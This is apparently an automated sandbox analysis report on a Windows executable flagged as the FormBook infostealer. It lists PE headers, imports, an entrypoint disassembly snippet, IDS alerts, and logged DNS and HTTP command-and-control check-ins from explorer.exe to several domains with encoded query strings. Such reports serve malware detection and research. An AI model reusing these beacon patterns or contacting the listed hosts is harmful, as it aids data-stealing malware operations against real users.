                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40323c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F736CBA2E9Eh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007F736CBA2B51h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F736CBA2B3Fh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F736CBA029Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F736CBA2632h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F736CBA02F5h
cmp cl, 00000020h
jne 00007F736CBA0298h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F736CBA028Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.4453125 | data | 5.18162709925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.51012867721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-13:17:26.479173 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49740 | 80 | 192.168.2.3 | 168.235.88.209
06/11/21-13:17:26.479173 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49740 | 80 | 192.168.2.3 | 168.235.88.209
06/11/21-13:17:26.479173 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49740 | 80 | 192.168.2.3 | 168.235.88.209
06/11/21-13:18:09.635602 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49744 | 34.102.136.180 | 192.168.2.3

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 13:17:07.099303961 CEST | 49733 | 80 | 192.168.2.3 | 142.250.180.243
Jun 11, 2021 13:17:07.160387039 CEST | 80 | 49733 | 142.250.180.243 | 192.168.2.3
Jun 11, 2021 13:17:07.160540104 CEST | 49733 | 80 | 192.168.2.3 | 142.250.180.243
Jun 11, 2021 13:17:07.160631895 CEST | 49733 | 80 | 192.168.2.3 | 142.250.180.243
Jun 11, 2021 13:17:07.221529007 CEST | 80 | 49733 | 142.250.180.243 | 192.168.2.3
Jun 11, 2021 13:17:07.244602919 CEST | 80 | 49733 | 142.250.180.243 | 192.168.2.3
Jun 11, 2021 13:17:07.244649887 CEST | 80 | 49733 | 142.250.180.243 | 192.168.2.3
Jun 11, 2021 13:17:07.245737076 CEST | 49733 | 80 | 192.168.2.3 | 142.250.180.243
Jun 11, 2021 13:17:07.245819092 CEST | 49733 | 80 | 192.168.2.3 | 142.250.180.243
Jun 11, 2021 13:17:07.306950092 CEST | 80 | 49733 | 142.250.180.243 | 192.168.2.3
Jun 11, 2021 13:17:26.353113890 CEST | 49740 | 80 | 192.168.2.3 | 168.235.88.209
Jun 11, 2021 13:17:26.478756905 CEST | 80 | 49740 | 168.235.88.209 | 192.168.2.3
Jun 11, 2021 13:17:26.478907108 CEST | 49740 | 80 | 192.168.2.3 | 168.235.88.209
Jun 11, 2021 13:17:26.479172945 CEST | 49740 | 80 | 192.168.2.3 | 168.235.88.209
Jun 11, 2021 13:17:26.604927063 CEST | 80 | 49740 | 168.235.88.209 | 192.168.2.3
Jun 11, 2021 13:17:26.604996920 CEST | 80 | 49740 | 168.235.88.209 | 192.168.2.3
Jun 11, 2021 13:17:26.605030060 CEST | 80 | 49740 | 168.235.88.209 | 192.168.2.3
Jun 11, 2021 13:17:26.605240107 CEST | 49740 | 80 | 192.168.2.3 | 168.235.88.209
Jun 11, 2021 13:17:26.605274916 CEST | 49740 | 80 | 192.168.2.3 | 168.235.88.209
Jun 11, 2021 13:17:26.731089115 CEST | 80 | 49740 | 168.235.88.209 | 192.168.2.3
Jun 11, 2021 13:17:46.943417072 CEST | 49741 | 80 | 192.168.2.3 | 159.89.244.183
Jun 11, 2021 13:17:47.070945024 CEST | 80 | 49741 | 159.89.244.183 | 192.168.2.3
Jun 11, 2021 13:17:47.071057081 CEST | 49741 | 80 | 192.168.2.3 | 159.89.244.183
Jun 11, 2021 13:17:47.071191072 CEST | 49741 | 80 | 192.168.2.3 | 159.89.244.183
Jun 11, 2021 13:17:47.198822975 CEST | 80 | 49741 | 159.89.244.183 | 192.168.2.3
Jun 11, 2021 13:17:47.198865891 CEST | 80 | 49741 | 159.89.244.183 | 192.168.2.3
Jun 11, 2021 13:17:47.198894978 CEST | 80 | 49741 | 159.89.244.183 | 192.168.2.3
Jun 11, 2021 13:17:47.199040890 CEST | 49741 | 80 | 192.168.2.3 | 159.89.244.183
Jun 11, 2021 13:17:47.199083090 CEST | 49741 | 80 | 192.168.2.3 | 159.89.244.183
Jun 11, 2021 13:17:47.328054905 CEST | 80 | 49741 | 159.89.244.183 | 192.168.2.3
Jun 11, 2021 13:18:09.453979015 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 13:18:09.496193886 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Jun 11, 2021 13:18:09.496407986 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 13:18:09.496512890 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 13:18:09.538758993 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Jun 11, 2021 13:18:09.635601997 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Jun 11, 2021 13:18:09.635651112 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Jun 11, 2021 13:18:09.635879040 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 13:18:09.635945082 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 13:18:09.678459883 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 13:16:00.477242947 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:00.535623074 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:01.364681959 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:01.423135042 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:02.154920101 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:02.216130972 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:02.961894989 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:03.012481928 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:03.829423904 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:03.883028030 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:04.826154947 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:04.879234076 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:05.713776112 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:05.766681910 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:06.733460903 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:06.783581972 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:07.550322056 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:07.601269960 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:08.434130907 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:08.485183954 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:09.220379114 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:09.270889044 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:10.143351078 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:10.196475983 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 13:16:11.505176067 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 13:16:11.556746960 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
                                                                                      Jun 11, 2021 13:16:12.765260935 CEST5708453192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:12.815587997 CEST53570848.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:13.655117989 CEST5882353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:13.713887930 CEST53588238.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:14.434154987 CEST5756853192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:14.484518051 CEST53575688.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:15.366101980 CEST5054053192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:15.419224024 CEST53505408.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:16.616947889 CEST5436653192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:16.667341948 CEST53543668.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:17.391630888 CEST5303453192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:17.444385052 CEST53530348.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:34.987735987 CEST5776253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:35.049618959 CEST53577628.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:44.285569906 CEST5543553192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:44.344434023 CEST53554358.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.007029057 CEST5071353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:07.093458891 CEST53507138.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:19.431802988 CEST5613253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:19.501478910 CEST53561328.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:23.321549892 CEST5898753192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:23.384686947 CEST53589878.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.274321079 CEST5657953192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST53565798.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:46.783575058 CEST6063353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:46.941773891 CEST53606338.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:54.752721071 CEST6129253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:54.820560932 CEST53612928.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:56.146701097 CEST6361953192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:56.208626032 CEST53636198.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.391463995 CEST6493853192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:18:09.452832937 CEST53649388.8.8.8192.168.2.3

DNS Queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                               Type            Class
Jun 11, 2021 13:17:07.007029057 CEST  192.168.2.3  8.8.8.8  0xb120    Standard query (0)  www.vacalinda.com                  A (IP address)  IN (0x0001)
Jun 11, 2021 13:17:26.274321079 CEST  192.168.2.3  8.8.8.8  0xc82d    Standard query (0)  www.servicesbackyard.com           A (IP address)  IN (0x0001)
Jun 11, 2021 13:17:46.783575058 CEST  192.168.2.3  8.8.8.8  0xade4    Standard query (0)  www.djspencer.com                  A (IP address)  IN (0x0001)
Jun 11, 2021 13:18:09.391463995 CEST  192.168.2.3  8.8.8.8  0xd817    Standard query (0)  www.caravansforsalenorthwales.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                               CName / Address                 Type                    Class
Jun 11, 2021 13:17:07.093458891 CEST  8.8.8.8    192.168.2.3  0xb120    No error (0)  www.vacalinda.com                  ghs.googlehosted.com            CNAME (Canonical name)  IN (0x0001)
Jun 11, 2021 13:17:07.093458891 CEST  8.8.8.8    192.168.2.3  0xb120    No error (0)  ghs.googlehosted.com               142.250.180.243                 A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  www.servicesbackyard.com           parking.namesilo.com            CNAME (Canonical name)  IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               168.235.88.209                  A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               107.161.23.204                  A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               209.141.38.71                   A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               188.164.131.200                 A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               198.251.81.30                   A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               70.39.125.244                   A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               204.188.203.155                 A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               45.58.190.82                    A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               192.161.187.200                 A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               198.251.84.92                   A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:26.350822926 CEST  8.8.8.8    192.168.2.3  0xc82d    No error (0)  parking.namesilo.com               64.32.22.102                    A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:46.941773891 CEST  8.8.8.8    192.168.2.3  0xade4    No error (0)  www.djspencer.com                  159.89.244.183                  A (IP address)          IN (0x0001)
Jun 11, 2021 13:17:46.941773891 CEST  8.8.8.8    192.168.2.3  0xade4    No error (0)  www.djspencer.com                  164.90.244.158                  A (IP address)          IN (0x0001)
Jun 11, 2021 13:18:09.452832937 CEST  8.8.8.8    192.168.2.3  0xd817    No error (0)  www.caravansforsalenorthwales.com  caravansforsalenorthwales.com   CNAME (Canonical name)  IN (0x0001)
Jun 11, 2021 13:18:09.452832937 CEST  8.8.8.8    192.168.2.3  0xd817    No error (0)  caravansforsalenorthwales.com      34.102.136.180                  A (IP address)          IN (0x0001)

HTTP Request Dependency Graph

• www.vacalinda.com
• www.servicesbackyard.com
• www.djspencer.com
• www.caravansforsalenorthwales.com

HTTP Packets

Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
0           192.168.2.3  49733        142.250.180.243  80                C:\Windows\explorer.exe

Timestamp                             kBytes transferred  Direction  Data
Jun 11, 2021 13:17:07.160631895 CEST  1261                OUT        GET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1
Host: www.vacalinda.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 13:17:07.244602919 CEST  1262                IN         HTTP/1.1 301 Moved Permanently
Location: http://www.vacalinda.cl
Date: Fri, 11 Jun 2021 11:17:07 GMT
Content-Type: text/html; charset=UTF-8
Server: ghs
Content-Length: 220
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Connection: close
                                                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 61 63 61 6c 69 6e 64 61 2e 63 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.vacalinda.cl">here</A>.</BODY></HTML>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.3  49740        168.235.88.209  80                C:\Windows\explorer.exe

Timestamp                             kBytes transferred  Direction  Data
Jun 11, 2021 13:17:26.479172945 CEST  5247                OUT        GET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1
Host: www.servicesbackyard.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 13:17:26.604996920 CEST  5247                IN         HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 11 Jun 2021 11:17:26 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://www.servicesbackyard.com?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.3  49741        159.89.244.183  80                C:\Windows\explorer.exe

Timestamp                             kBytes transferred  Direction  Data
Jun 11, 2021 13:17:47.071191072 CEST  5251                OUT        GET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1
Host: www.djspencer.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 13:17:47.198865891 CEST  5252                IN         HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Jun 2021 11:17:47 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://perfectdomain.com/domain/djspencer.com
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
3           192.168.2.3  49744        34.102.136.180  80                C:\Windows\explorer.exe

Timestamp                             kBytes transferred  Direction  Data
Jun 11, 2021 13:18:09.496512890 CEST  5271                OUT        GET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1
Host: www.caravansforsalenorthwales.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 13:18:09.635601997 CEST  5271                IN         HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 11 Jun 2021 11:18:09 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60c03ab8-113"
Via: 1.1 google
Connection: close
